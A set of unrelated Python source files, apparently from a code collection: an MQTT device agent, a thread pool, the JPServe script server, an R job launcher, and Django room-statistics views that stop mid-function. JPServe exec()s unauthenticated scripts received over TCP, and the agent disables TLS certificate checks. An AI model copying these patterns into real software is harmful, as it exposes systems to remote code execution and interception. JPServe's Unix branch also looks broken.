self.device_name = f'{self.configuration.getValue("agent", "name")}-{serial}'
self.device_type = self.configuration.getValue('agent', 'type')
self.tedge = self.configuration.getBooleanValue('agent', 'tedge')
self.rest_url = self.configuration.getValue('rest', 'url')
self.stop_event = threading.Event()
self.refresh_token_interval = 60
self.token = None
self.is_connected = False
self.rest_client = RestClient(self)
if self.simulated:
self.model = 'docker'
else:
self.model = 'raspberry'
def handle_sensor_message(self, sensor):
messages = sensor.getSensorMessages()
if messages is not None and len(messages) > 0:
for message in messages:
self.publishMessage(message)
def handle_initializer_message(self, initializer):
messages = initializer.getMessages()
if messages is not None and len(messages) > 0:
for message in messages:
if message:
self.logger.debug('Send topic: %s, msg: %s',
message.topic, message.getMessage())
self.publishMessage(message)
def run(self):
try:
self.logger.info('Starting agent')
self.__client = mqtt.Client(self.serial)
credentials = self.configuration.getCredentials()
self.__client = self.connect(
credentials, self.serial, self.url, int(self.port), int(self.ping))
self.__client.loop_start()
while not self.is_connected:
time.sleep(1)
self.logger.debug('Waiting for MQTT Client to be connected')
self.__init_agent()
while not self.stopmarker:
self.logger.debug('New cycle')
self.interval = int(self.configuration.getValue(
'agent', 'main.loop.interval.seconds'))
for sensor in self.__sensors:
sensor_thread = threading.Thread(target=self.handle_sensor_message, args=(sensor,))
sensor_thread.daemon = True
sensor_thread.name = f'SensorThread-{sensor.__class__.__name__}'
sensor_thread.start()
#_thread.start_new_thread(self.handle_sensor_message, (sensor,))
time.sleep(self.interval)
except Exception as e:
self.logger.exception(f'Error in C8Y Agent: {e}', e)
self.disconnect(self.__client)
self.logger.info('Will retry to connect to C8Y in 5 sec...')
time.sleep(5)
# Run again after 5 sec. delay.
self.run()
def connect(self, credentials, serial, url, port, ping):
try:
self.__client.on_connect = self.__on_connect
self.__client.on_message = self.__on_message
self.__client.on_disconnect = self.__on_disconnect
#self.__client.on_subscribe = self.__on_subscribe
self.__client.on_log = self.__on_log
if self.tls:
if self.cert_auth:
self.logger.debug('Using certificate authenticaiton')
self.__client.tls_set(self.cacert,
certfile=self.client_cert,
keyfile=self.client_key,
tls_version=ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_NONE
)
else:
self.__client.tls_set(self.cacert)
self.__client.username_pw_set(
credentials[0]+'/' + credentials[1], credentials[2])
else:
self.__client.username_pw_set(
credentials[0]+'/' + credentials[1], credentials[2])
self.__client.connect(url, int(port), int(ping))
self.__client.loop_start()
return self.__client
except Exception as e:
self.logger.exception(f'Error on connecting C8Y Agent: {e}', e)
self.disconnect(self.__client)
self.logger.info('Will retry to connect to C8Y in 5 sec...')
time.sleep(5)
# Run again after 5 sec. delay.
return self.run()
def disconnect(self, client):
self.logger.info("Disconnecting MQTT Client")
self.__client = None
if client == None:
return
client.loop_stop() # stop the loop
client.disconnect()
if self.cert_auth:
self.logger.info("Stopping refresh token thread")
self.stop_event.set()
def stop(self):
msg = SmartRESTMessage('s/us', '400', ['c8y_AgentStopEvent', 'C8Y DM Agent stopped'])
self.publishMessage(msg, qos=0, wait_for_publish=True)
self.disconnect(self.__client)
self.stopmarker = 1
def pollPendingOperations(self):
while not self.stopmarker:
try:
time.sleep(15)
self.logger.debug('Polling for pending Operations')
pending = SmartRESTMessage('s/us', '500', [])
self.publishMessage(pending)
except Exception as e:
self.logger.error(
'Error on polling for Pending Operations: ' + str(e))
def __init_agent(self):
self.__listeners = []
self.__sensors = []
# set Device Name
msgId = '100' if self.tedge else '101'
vals = [self.device_name, self.device_type] if self.tedge else [self.serial, self.device_name, self.device_type]
self.publishMessage(SmartRESTMessage('s/us', msgId, vals), 2, wait_for_publish=True)
#self.__client.publish(
# "s/us", "100,"+self.device_name+","+self.device_type, 2).wait_for_publish()
#self.logger.info(f'Device published!')
commandHandler = CommandHandler(self.serial, self, self.configuration)
configurationManager = ConfigurationManager(
self.serial, self, self.configuration)
messages = configurationManager.getMessages()
for message in messages:
self.logger.debug('Send topic: %s, msg: %s',
message.topic, message.getMessage())
self.__client.publish(message.topic, message.getMessage())
self.__listeners.append(commandHandler)
self.__listeners.append(configurationManager)
self.__supportedOperations.update(
commandHandler.getSupportedOperations())
self.__supportedOperations.update(
configurationManager.getSupportedOperations())
# Load custom modules
modules = moduleloader.findAgentModules()
classCache = {}
for sensor in modules['sensors']:
currentSensor = sensor(self.serial, self)
classCache[sensor.__name__] = currentSensor
self.__sensors.append(currentSensor)
for listener in modules['listeners']:
if listener.__name__ in classCache:
currentListener = classCache[listener.__name__]
else:
currentListener = listener(self.serial, self)
classCache[listener.__name__] = currentListener
supportedOperations = currentListener.getSupportedOperations()
supportedTemplates = currentListener.getSupportedTemplates()
if supportedOperations is not None:
self.__supportedOperations.update(supportedOperations)
if supportedTemplates is not None:
self.__supportedTemplates.update(supportedTemplates)
self.__listeners.append(currentListener)
for initializer in modules['initializers']:
if initializer.__name__ in classCache:
currentInitializer = classCache[initializer.__name__]
else:
currentInitializer = initializer(self.serial, self)
classCache[initializer.__name__] = currentInitializer
init_thread = threading.Thread(target=self.handle_initializer_message, args=(currentInitializer,))
init_thread.daemon = True
init_thread.name = f'InitializerThread-{currentInitializer.__class__.__name__}'
init_thread.start()
#_thread.start_new_thread(self.handle_initializer_message, (currentInitializer,))
classCache = None
# set supported operations
self.logger.info('Supported operations:')
self.logger.info(self.__supportedOperations)
supportedOperationsMsg = SmartRESTMessage(
's/us', 114, list(self.__supportedOperations))
self.publishMessage(supportedOperationsMsg)
# set required interval
required_interval = self.configuration.getValue(
'agent', 'requiredinterval')
self.logger.info(f'Required interval: {required_interval}')
requiredIntervalMsg = SmartRESTMessage(
's/us', 117, [f'{required_interval}'])
self.publishMessage(requiredIntervalMsg)
# set device model
self.logger.info('Model:')
self.logger.info([self.serial, self.model, '1.0'])
modelMsg = SmartRESTMessage(
's/us', 110, [self.serial, self.model, '1.0'])
self.publishMessage(modelMsg)
self.__subscribe('s/e')
self.__subscribe('s/ds')
self.__subscribe('s/dat')
# subscribe additional topics
for xid in self.__supportedTemplates:
self.logger.info('Subscribing to XID: %s', xid)
self.__subscribe('s/dc/' + xid)
if self.cert_auth:
self.logger.info("Starting refresh token thread ")
token_thread = threading.Thread(target=self.refresh_token)
token_thread.daemon = True
token_thread.name = f'TokenThread-1'
token_thread.start()
#_thread.start_new_thread(self.refresh_token)
# refresh_token_thread.start()
# Set all dangling Operations to failed on Agent start
internald_id = self.rest_client.get_internal_id(self.serial)
ops = self.rest_client.get_all_dangling_operations(internald_id)
self.rest_client.set_operations_to_failed(ops)
def __on_connect(self, client, userdata, flags, rc):
try:
self.logger.info('Agent connected with result code: ' + str(rc))
if rc > 0:
self.logger.warning(
'Disconnecting Agent and try to re-connect manually..')
# TODO What should be done when rc != 0? Reconnect? Abort?
self.disconnect(self.__client)
time.sleep(5)
self.logger.info('Restarting Agent ..')
self.run()
else:
self.is_connected = True
except Exception as ex:
self.logger.error(ex)
def __subscribe(self, topic):
topic = f'c8y/{topic}' if self.tedge else topic
self.__client.subscribe(topic)
def __on_message(self, client, userdata, msg):
try:
decoded = msg.payload.decode('utf-8')
messageParts = decoded.split(',')
message = SmartRESTMessage(
msg.topic, messageParts[0], messageParts[1:])
self.logger.debug('Received: topic=%s msg=%s',
message.topic, message.getMessage())
destSerial = messageParts[1]
if message.messageId == '71':
self.token = message.values[0]
self.logger.info('New JWT Token received')
elif message.topic == 's/ds' and destSerial != self.serial:
self.logger.debug(f'ignoring an operation to {destSerial}')
return
for listener in self.__listeners:
self.logger.debug('Trigger listener ' +
listener.__class__.__name__)
listener_thread = threading.Thread(target=listener.handleOperation, args=(message,))
listener_thread.daemon = True
listener_thread.name = f'ListenerThread-{listener.__class__.__name__}'
listener_thread.start()
#_thread.start_new_thread(listener.handleOperation, (message,))
except Exception as e:
self.logger.error(f'Error on handling MQTT Message.', e)
def __on_disconnect(self, client, userdata, rc):
self.logger.debug("on_disconnect rc: " + str(rc))
# if rc==5:
# self.reset()
# return
if rc != 0:
self.logger.error(f'Disconnected with result code {rc}! Trying to reconnect...')
#self.__client.reconnect()
time.sleep(5)
# Run again after 5 sec. delay.
return self.run()
def __on_log(self, client, userdata, level, buf):
self.logger.log(level, buf)
def publishMessage(self, message, qos=0, wait_for_publish=False):
if self.tedge:
if message.values != [] and message.values[0] == '101':
message.topic = f'c8y/{message.topic}'
else:
message.topic = f'c8y/{message.topic}/{self.serial}'
self.logger.debug(f'Send: topic={message.topic} msg={message.getMessage}')
if self.__client is not None and self.__client.is_connected:
if wait_for_publish:
self.__client.publish(message.topic, message.getMessage(), qos).wait_for_publish()
else:
self.__client.publish(message.topic, message.getMessage(), qos)
def refresh_token(self):
self.stop_event.clear()
while True:
self.logger.info("Refreshing Token")
self.__client.publish('s/uat','',2)
if self.stop_event.wait(timeout=self.refresh_token_interval):
self.logger.info("Exit Refreshing Token Thread")
break
|
threadpool.py
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cached thread pool, inspired from Pelix/iPOPO Thread Pool
:author: Thomas Calmant
:copyright: Copyright 2017, Thomas Calmant
:license: Apache License 2.0
:version: 0.3.1
..
Copyright 2017 Thomas Calmant
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Standard library
import logging
import threading
try:
# Python 3
# pylint: disable=F0401
import queue
except ImportError:
# Python 2
# pylint: disable=F0401
import Queue as queue
# ------------------------------------------------------------------------------
# Module version
__version_info__ = (0, 3, 1)
__version__ = ".".join(str(x) for x in __version_info__)
# Documentation strings format
__docformat__ = "restructuredtext en"
# ------------------------------------------------------------------------------
class EventData(object):
"""
A threading event with some associated data
"""
def __init__(self):
"""
Sets up the event
"""
self.__event = threading.Event()
self.__data = None
self.__exception = None
@property
def data(self):
"""
Returns the associated value
"""
return self.__data
@property
def exception(self):
"""
Returns the exception used to stop the wait() method
"""
return self.__exception
def clear(self):
"""
Clears the event
"""
self.__event.clear()
self.__data = None
self.__exception = None
def is_set(self):
"""
Checks if the event is set
"""
return self.__event.is_set()
def set(self, data=None):
"""
Sets the event
"""
self.__data = data
self.__exception = None
self.__event.set()
def raise_exception(self, exception):
"""
Raises an exception in wait()
:param exception: An Exception object
"""
self.__data = None
self.__exception = exception
self.__event.set()
def wait(self, timeout=None):
"""
Waits for the event or for the timeout
:param timeout: Wait timeout (in seconds)
:return: True if the event as been set, else False
"""
# The 'or' part is for Python 2.6
result = self.__event.wait(timeout)
# pylint: disable=E0702
# Pylint seems to miss the "is None" check below
if self.__exception is None:
return result
else:
raise self.__exception
class FutureResult(object):
"""
An object to wait for the result of a threaded execution
"""
def __init__(self, logger=None):
"""
Sets up the FutureResult object
:param logger: The Logger to use in case of error (optional)
"""
self._logger = logger or logging.getLogger(__name__)
self._done_event = EventData()
self.__callback = None
self.__extra = None
def __notify(self):
"""
Notify the given callback about the result of the execution
"""
if self.__callback is not None:
try:
self.__callback(self._done_event.data,
self._done_event.exception,
self.__extra)
except Exception as ex:
self._logger.exception("Error calling back method: %s", ex)
def set_callback(self, method, extra=None):
"""
Sets a callback method, called once the result has been computed or in
case of exception.
The callback method must have the following signature:
``callback(result, exception, extra)``.
:param method: The method to call back in the end of the execution
:param extra: Extra parameter to be given to the callback method
"""
self.__callback = method
self.__extra = extra
if self._done_event.is_set():
# The execution has already finished
self.__notify()
def execute(self, method, args, kwargs):
"""
Execute the given method and stores its result.
The result is considered "done" even if the method raises an exception
:param method: The method to execute
:param args: Method positional arguments
:param kwargs: Method keyword arguments
:raise Exception: The exception raised by the method
"""
# Normalize arguments
if args is None:
args = []
if kwargs is None:
kwargs = {}
try:
# Call the method
result = method(*args, **kwargs)
except Exception as ex:
# Something went wrong: propagate to the event and to the caller
self._done_event.raise_exception(ex)
raise
else:
# Store the result
self._done_event.set(result)
finally:
# In any case: notify the call back (if any)
self.__notify()
def done(self):
"""
Returns True if the job has finished, else False
"""
return self._done_event.is_set()
def result(self, timeout=None):
"""
Waits up to timeout for the result the threaded job.
Returns immediately the result if the job has already been done.
:param timeout: The maximum time to wait for a result (in seconds)
:raise OSError: The timeout raised before the job finished
:raise Exception: The exception encountered during the call, if any
"""
if self._done_event.wait(timeout):
return self._done_event.data
else:
raise OSError("Timeout raised")
# ------------------------------------------------------------------------------
class ThreadPool(object):
"""
Executes the tasks stored in a FIFO in a thread pool
"""
def __init__(self, max_threads, min_threads=1, queue_size=0, timeout=60,
logname=None):
"""
Sets up the thread pool.
Threads are kept alive 60 seconds (timeout argument).
:param max_threads: Maximum size of the thread pool
:param min_threads: Minimum size of the thread pool
:param queue_size: Size of the task queue (0 for infinite)
:param timeout: Queue timeout (in seconds, 60s by default)
:param logname: Name of the logger
:raise ValueError: Invalid number of threads
"""
# Validate parameters
try:
max_threads = int(max_threads)
if max_threads < 1:
raise ValueError("Pool size must be greater than 0")
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
try:
min_threads = int(min_threads)
if min_threads < 0:
min_threads = 0
elif min_threads > max_threads:
min_threads = max_threads
except (TypeError, ValueError) as ex:
raise ValueError("Invalid pool size: {0}".format(ex))
# The logger
self._logger = logging.getLogger(logname or __name__)
# The loop control event
self._done_event = threading.Event()
self._done_event.set()
# The task queue
try:
queue_size = int(queue_size)
except (TypeError, ValueError):
# Not a valid integer
queue_size = 0
self._queue = queue.Queue(queue_size)
self._timeout = timeout
self.__lock = threading.RLock()
# The thread pool
self._min_threads = min_threads
self._max_threads = max_threads
self._threads = []
# Thread count
self._thread_id = 0
# Current number of threads, active and alive,
# and number of task waiting
self.__nb_threads = 0
self.__nb_active_threads = 0
self.__nb_pending_task = 0
def start(self):
"""
Starts the thread pool. Does nothing if the pool is already started.
"""
if not self._done_event.is_set():
# Stop event not set: we're running
return
# Clear the stop event
self._done_event.clear()
# Compute the number of threads to start to handle pending tasks
nb_pending_tasks = self._queue.qsize()
if nb_pending_tasks > self._max_threads:
nb_threads = self._max_threads
nb_pending_tasks = self._max_threads
elif nb_pending_tasks < self._min_threads:
nb_threads = self._min_threads
else:
nb_threads = nb_pending_tasks
# Create the threads
for _ in range(nb_pending_tasks):
self.__nb_pending_task += 1
self.__start_thread()
for _ in range(nb_threads-nb_pending_tasks):
self.__start_thread()
def __start_thread(self):
"""
Starts a new thread, if possible
"""
with self.__lock:
if self.__nb_threads >= self._max_threads:
# Can't create more threads
return False
if self._done_event.is_set():
# We're stopped: do nothing
return False
# Prepare thread and start it
name = "{0}-{1}".format(self._logger.name, self._thread_id)
self._thread_id += 1
thread = threading.Thread(target=self.__run, name=name)
thread.daemon = True
try:
self.__nb_threads += 1
thread.start()
self._threads.append(thread)
return True
except (RuntimeError, OSError):
self.__nb_threads -= 1
return False
def stop(self):
"""
Stops the thread pool. Does nothing if the pool is already stopped.
"""
if self._done_event.is_set():
# Stop event set: we're stopped
return
# Set the stop event
self._done_event.set()
with self.__lock:
# Add something in the queue (to unlock the join())
try:
for _ in self._threads:
self._queue.put(self._done_event, True, self._timeout)
except queue.Full:
# There is already something in the queue
pass
# Copy the list of threads to wait for
threads = self._threads[:]
# Join threads outside the lock
for thread in threads:
while thread.is_alive():
# Wait 3 seconds
thread.join(3)
if thread.is_alive():
# Thread is still alive: something might be wrong
self._logger.warning("Thread %s is still alive...",
thread.name)
# Clear storage
del self._threads[:]
self.clear()
def enqueue(self, method, *args, **kwargs):
"""
Queues a task in the pool
:param method: Method to call
:return: A FutureResult object, to get the result of the task
:raise ValueError: Invalid method
:raise Full: The task queue is full
"""
if not hasattr(method, '__call__'):
raise ValueError("{0} has no __call__ member."
.format(method.__name__))
# Prepare the future result object
future = FutureResult(self._logger)
# Use a lock, as we might be "resetting" the queue
with self.__lock:
# Add the task to the queue
self._queue.put((method, args, kwargs, future), True,
self._timeout)
self.__nb_pending_task += 1
if self.__nb_pending_task > self.__nb_threads:
# All threads are taken: start a new one
self.__start_thread()
return future
def clear(self):
"""
Empties the current queue content.
Returns once the queue have been emptied.
"""
with self.__lock:
# Empty the current queue
try:
while True:
self._queue.get_nowait()
self._queue.task_done()
except queue.Empty:
# Queue is now empty
pass
# Wait for the tasks currently executed
self.join()
def join(self, timeout=None):
"""
Waits for all the tasks to be executed
:param timeout: Maximum time to wait (in seconds)
:return: True if the queue has been emptied, else False
"""
if self._queue.empty():
# Nothing to wait for...
return True
elif timeout is None:
# Use the original join
self._queue.join()
return True
else:
# Wait for the condition
with self._queue.all_tasks_done:
self._queue.all_tasks_done.wait(timeout)
return not bool(self._queue.unfinished_tasks)
def __run(self):
"""
The main loop
"""
while not self._done_event.is_set():
try:
# Wait for an action (blocking)
task = self._queue.get(True, self._timeout)
if task is self._done_event:
# Stop event in the queue: get out
self._queue.task_done()
with self.__lock:
self.__nb_threads -= 1
return
except queue.Empty:
# Nothing to do yet
pass
else:
with self.__lock:
self.__nb_active_threads += 1
# Extract elements
method, args, kwargs, future = task
try:
# Call the method
future.execute(method, args, kwargs)
except Exception as ex:
self._logger.exception("Error executing %s: %s",
method.__name__, ex)
finally:
# Mark the action as executed
self._queue.task_done()
# Thread is not active anymore
with self.__lock:
self.__nb_pending_task -= 1
self.__nb_active_threads -= 1
# Clean up thread if necessary
with self.__lock:
extra_threads = self.__nb_threads - self.__nb_active_threads
if self.__nb_threads > self._min_threads \
and extra_threads > self._queue.qsize():
# No more work for this thread
# if there are more non active_thread than task
# and we're above the minimum number of threads:
# stop this one
self.__nb_threads -= 1
return
with self.__lock:
# Thread stops
self.__nb_threads -= 1
|
jpserve.py
|
r"""JPServer is a Python script executor running on the Python side.
JPServe receiving and executing the script from 3rd-part languages,
then send back the result as JSON format to the caller.
Usages:
- Start server
server = JPServe(("hostname", port))
server.start()
- Stop server
server.shutdown()
- Set log level
server.setLogLevel(logging.DEBUG)
- The sample to make call from java side
import net.xdevelop.jpserve.PyClient
import net.xdevelop.jpserve.PyResult
String script = "a = 2\r\n" +
"b = 3\r\n" +
"_result_ = a * b\r\n";
PyClient client = PyClient.getInstance("localhost", "8888");
PyResult rs = client.exec(script);
// output the _result_ value calculated by Python
if (rs.getSuccess()) {
System.out.println(rs.getResult());
}
else {
System.out.println(rs.getMsg());
}
- calling pyclient from python is also supported
import socket
host = "localhost" #socket.gethostname()
port = 27018 # The same port as used by the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
f = str(open('tempCode.py').read()).encode('utf-8')
s.sendall("#!{\r\n".encode("utf-8") +
f+
# '_result_ = 1+1'.encode("utf-8") +
"\r\n#!}\r\n".encode("utf-8"))
data = s.recv(1024)
data2 = s.recv(1024)
data3 = s.recv(1024)
s.close()
import json, bson
data2_2 = bson.loads(data2)
import pickle
data2_2_2 = pickle.loads(data2_2['result'])
print('Received', repr(data.decode()) +
repr(data2_2_2) + repr(data3))
# Received '#!{\r\n'array([1, 2, 3, 4])b'\r\n#!}\r\n'
"""
from socketserver import StreamRequestHandler
import logging
import os
if os.name == 'nt':
from socketserver import ThreadingTCPServer
class PThreadingTCPServer(ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ThreadingTCPServer.shutdown(self)
else:
from socketserver import ForkingTCPServer
class PForkingTCPServer(ForkingTCPServer):
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.stopped = False
def shutdown(self):
self.stopped = True
ForkingTCPServer.shutdown(self)
import threading
import json, pickle, bson
__all__ = ["JPServe"]
logger = logging.getLogger('JPServe')
class JPServe():
def __init__(self, server_address, XSON = 'JSON'):
self.server_address = server_address
self.XSON = XSON
import pathlib
logging.basicConfig(level=logging.INFO, filename= pathlib.Path(r'C:\Users\ASUS\Documents\python\JPserve.log'))
logger.setLevel(logging.INFO)
def start(self):
logger.info("JPServe starting...")
if self.XSON == 'JSON':
_ServeHandler = ServeHandlerJ
pass
elif self.XSON == 'BSON':
_ServeHandler = ServeHandlerB
if os.name == 'nt':
self.serv = PThreadingTCPServer(self.server_address, _ServeHandler)
else:
self.serv = PForkingTCPServer(self.server_address, _ServeHandler)
self.t = threading.Thread(target=self.serv.serve_forever)
self.t.start()
logger.info("JPServe listening in %s %s " % self.server_address)
def shutdown(self):
try:
self.serv.shutdown()
self.serv.server_close()
except Exception as e:
logger.error(e.getMessage())
logger.info("JPServe stopped.")
def setLogLevel(self, level):
logger.setLevel(level)
# Constant values for ServerHandler
BEGIN_MARK = b"#!{"
END_MARK = b"#!}"
CMD_EXIT = b"#!exit"
class ServeHandler(StreamRequestHandler):
r""" The handler to receive and exec the python script from 3rd-part side.
Client request syntax:
line0: #!{
line1-n: python script
linen+1: _result_ = the value return to caller
linen+2: #!}
Response to client:
line0: #!{
#!{
{
"result": _result_ value,
"success": true or false,
"msg": "success" or "error message"
}
#!}
Example:
Request:
#!{
a = 2 * 3
_result_= a
#!}
Response:
#!{
{
"result": 6,
"success": true,
"msg": "success"
}
#!}
"""
def handle(self):
self.request.setblocking(False)
while True:
if self.server.stopped:
break
try:
# read begin mark #!{
begin_mark = self.rfile.readline().strip()
if (begin_mark == CMD_EXIT): # end request
logger.info("Client (%s:%d) exit." % (self.client_address[0], self.client_address[1]))
break
if begin_mark != BEGIN_MARK:
continue
# read python script
script = ""
lines = []
while not self.server.stopped:
data = self.rfile.readline()
if data.strip() == END_MARK: # check end mark
break
elif len(data) > 0:
lines.append(data.decode("utf-8"))
script = "".join(lines)
logger.info("Received script from (%s:%d): \n%s" % (self.client_address[0], self.client_address[1], script))
except Exception as e:
logger.error("Read request failed: %s" % str(e))
break
if self.server.stopped:
break
# exec script
local_vars = {}
try:
local_vars["_result_"] = None
exec(compile(script, "<string>", "exec"), globals(), local_vars)
local_vars["_success_"] = True
local_vars["_msg_"] = "success"
except Exception as e:
logger.error("Exec script failed: %s" % str(e))
local_vars["_success_"] = False
local_vars["_msg_"] = "Execute script failed: %s" % str(e)
try:
response = self.toXSON(local_vars)
logger.info("return: %s" % response)
self.wfile.write("#!{\r\n".encode("utf-8"))
self.wfile.write(response)
self.wfile.write("\r\n#!}\r\n".encode("utf-8"))
except Exception as e:
logger.error("Sent result to client failed: %s" % str(e))
break
def toBSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": pickle.dumps(local_vars["_result_"]) }
response = bson.dumps(rs)
return response
pass
def toJSON(self, local_vars):
rs = {"success": local_vars["_success_"], "msg": local_vars["_msg_"], "result": json.dumps(local_vars["_result_"]) }
response = json.dumps(rs, indent=4)
response = bytes(response, "utf-8")
return response
class ServeHandlerB(ServeHandler):
def __init__(self, *arg, **kwarg):
self.toXSON = self.toBSON
super().__init__( *arg, **kwarg)
self.toXSON = self.toBSON
pass
class ServeHandlerJ(ServeHandler):
def __init__(self, *arg, **kwarg):
self.toXSON = self.toJSON
super().__init__( *arg, **kwarg)
self.toXSON = self.toJSON
pass
if __name__ == "__main__":
host = "localhost"
port = 8888
addr = (host, port)
jpserve = JPServe(addr, XSON = 'BSON')
jpserve.start()
|
run_fit.py
|
#!/usr/bin/python
# run_fit.py - driver for running the fitting codes in parallel
# by launching multiplt (12 in this case) jobs
#
#
# Created by Michal Ben-Nun on 5/19/20.
#
import multiprocessing
from multiprocessing import Process
import os
import string
import random
import numpy as np
def info(title):
print title
print 'module name:',__name__
if hasattr(os,'getppid'):
print 'parent process:',os.getpid()
print 'process id: ',os.getpid()
##
## change which R fitting routine to use
## world_mcmc_fit_calendar_time.R or
## world_mcmc_fit_pandemic_time.R
##
##
## start/end: currently set to fit top 120 locations
##
def f(start,end):
os.system("time Rscript world_mcmc_fit_calendar_time.R "+str(start)+" "+str(end))
nthreads = 12
start=np.array([i for i in range(1, 120,10)])
end=np.array([i for i in range(10,121,10)])
if __name__ == '__main__':
info('main line')
p1 = Process(target=f,args=(start[0],end[0],))
p1.start()
p2 = Process(target=f,args=(start[1],end[1],))
p2.start()
p3 = Process(target=f,args=(start[2],end[2],))
p3.start()
p4 = Process(target=f,args=(start[3],end[3],))
p4.start()
p5 = Process(target=f,args=(start[4],end[4],))
p5.start()
p6 = Process(target=f,args=(start[5],end[5],))
p6.start()
p7 = Process(target=f,args=(start[6],end[6],))
p7.start()
p8 = Process(target=f,args=(start[7],end[7],))
p8.start()
p9 = Process(target=f,args=(start[8],end[8],))
p9.start()
p10 = Process(target=f,args=(start[9],end[9],))
p10.start()
p11 = Process(target=f,args=(start[10],end[10],))
p11.start()
p12 = Process(target=f,args=(start[11],end[11],))
p12.start()
|
views.py
|
from django.shortcuts import render
from stats.models import StatsLog, Day, Month, Year
from django.http import HttpResponse
#from datetime import datetime
from django.core.cache import cache
import time
import datetime
import threading
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import os
from floor.models import Room
from django.db.models import Sum, Avg, F
from django.contrib.auth.decorators import login_required
from .forms import RoomRequestForm
def get_stats(ID):
stats = {}
stats['day'] = Day.objects.filter(roomID=ID)
stats['month'] = Month.objects.filter(roomID=ID)
stats['year'] = Year.objects.filter(roomID=ID)
stats['ID'] = ID
return stats
def createGraph(stats, duration=''):
# remove old graphs
if os.path.exists('stats/static/days.png') and duration == 'day':
os.remove('stats/static/days.png')
if os.path.exists('stats/static/months.png') and duration == 'month':
os.remove('stats/static/months.png')
if os.path.exists('stats/static/years.png') and duration == 'year':
os.remove('stats/static/years.png')
x = []
y = []
z = []
for obj in stats:
x.append(obj.date)
y.append(obj.totalOccupants)
z.append(obj.avgOccLength.total_seconds()/60.0)
fig, (ax1, ax2) = plt.subplots(1, 2)
plt.subplots_adjust(left=.125, right=.9, bottom=.1, top=.9, wspace=.2, hspace=.2)
ax1.bar(x, y, align='center', alpha=0.5)
ax2.bar(x, z, align='center', alpha=0.5)
fig.autofmt_xdate()
fig.set_figheight(10)
fig.set_figwidth(15)
ax1.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax2.fmt_xdata = mdates.DateFormatter('%Y-%m-%d')
ax1.set_xlabel('Date')
ax2.set_xlabel('Date')
ax1.set_ylabel('Total Occupants')
ax2.set_ylabel('Average Occupancy Time (minutes)')
if duration == 'day':
fig.suptitle('Total Occupants & Average Occupancy Time for Days')
plt.savefig('stats/static/days.png')
elif duration == 'month':
fig.suptitle('Total Occupants & Average Occupancy Time for Months')
plt.savefig('stats/static/months.png')
elif duration == 'year':
fig.suptitle('Total Occupants & Average Occupancy Time for Years')
plt.savefig('stats/static/years.png')
plt.close()
@login_required
def index(request):
'''
@return display of stats page
'''
if request.method == 'POST':
form = RoomRequestForm(request.POST)
if form.is_valid():
stats = get_stats(form.data['room'])
# create and save new graphs
createGraph(stats['day'], duration='day')
createGraph(stats['month'], duration='month')
createGraph(stats['year'], duration='year')
return render(request, 'stats/templates/html/stats.html', {'stats':stats})
else:
form = RoomRequestForm()
return render(request, 'stats/templates/html/stats.html', {'form': form})
def log(rID, e):
currLog = StatsLog(event = e, roomID = rID, date = datetime.datetime.now())
currLog.save()
def createTimeObject(ID, duration, now):
timeObject = None
if duration == "day":
timeObject = Day()
elif duration == "month":
timeObject = Month()
elif duration == "year":
timeObject = Year()
else:
print("ERROR: INVALID TIME OBJECT REQUEST")
timeObject.date = now
timeObject.roomID = ID
logList = importLog(ID, now, duration)
# print("New timeObject time:", timeObject.date)
# print("Duration:", duration)
# print("timeObject type:", type(timeObject))
timeObject.totalOccupants = getOccupants(logList)
timeObject.avgOccLength = calcAvgOccLength(logList)
if timeObject.avgOccLength == 0:
timeObject.avgOccLength = datetime.timedelta()
timeObject.save()
def threadf(name):
'''
Seperate thread which creates time objects
every hour/day/month/year. Everytime one of
those pass create an object with information
from logs for each room
'''
start = datetime.datetime.now()
last = start
floor3IDs = cache.get('floor3')
floor4IDs = cache.get('floor4')
now = datetime.datetime.now()
while True:
time.sleep(5)
now = datetime.datetime.now()
entered = False
if now.day != last.day:
for ID in floor3IDs:
createTimeObject(ID,"day", last)
for ID in floor4IDs:
createTimeObject(ID,"day", last)
entered = True
if now.month != last.month:
for ID in floor3IDs:
createTimeObject(ID,"month", last)
for ID in floor4IDs:
createTimeObject(ID,"month", last)
entered = True
if now.year != last.year:
for ID in floor3IDs:
createTimeObject(ID,"year", last)
for ID in floor4IDs:
createTimeObject(ID,"year", last)
entered = True
if entered:
last = now
def startThread():
print("Starting Thread")
t = threading.Thread(target=threadf, args=(1,))
t.setDaemon(True)
t.start()
def importLog(ID, now, duration):
query = None
#Finds different events depending on the RoomID and the day/month/year and then returns those events
if duration == 'day':
query = StatsLog.objects.filter(roomID=ID,date__month=now.month, date__day=now.day)
elif duration == 'month':
query = StatsLog.objects.filter(roomID=ID, date__year=now.year, date__month=now.month)
elif duration == 'year':
query = StatsLog.objects.filter(roomID=ID, date__year=now.year)
return query
def getOccupants(query):
'''
Return the number of people in the room.
Gets information from logs.
Returns the amount of events in the log
divided by two since everyone that enters a
room has to exit the room.
'''
return int(len(query)/2)
def calcTimeDifference(query):
#calculates the time difference between the FIRST person entering the room and when the first person leaves the room
#This is to help handle the issue of multiple people entering and then leaving a room
timeDiff = []
tmp_entry = None
for log in query:
# if the log contains entry data
if log.event == 1 and tmp_entry == None:
tmp_entry = log
# else the log contains exit data (and doesn't start with exit data)
elif log.event == 0 and tmp_entry != None:
timeDiff.append(log.date - tmp_entry.date)
tmp_entry = None
return timeDiff
def calcAvgOccLength(query):
'''
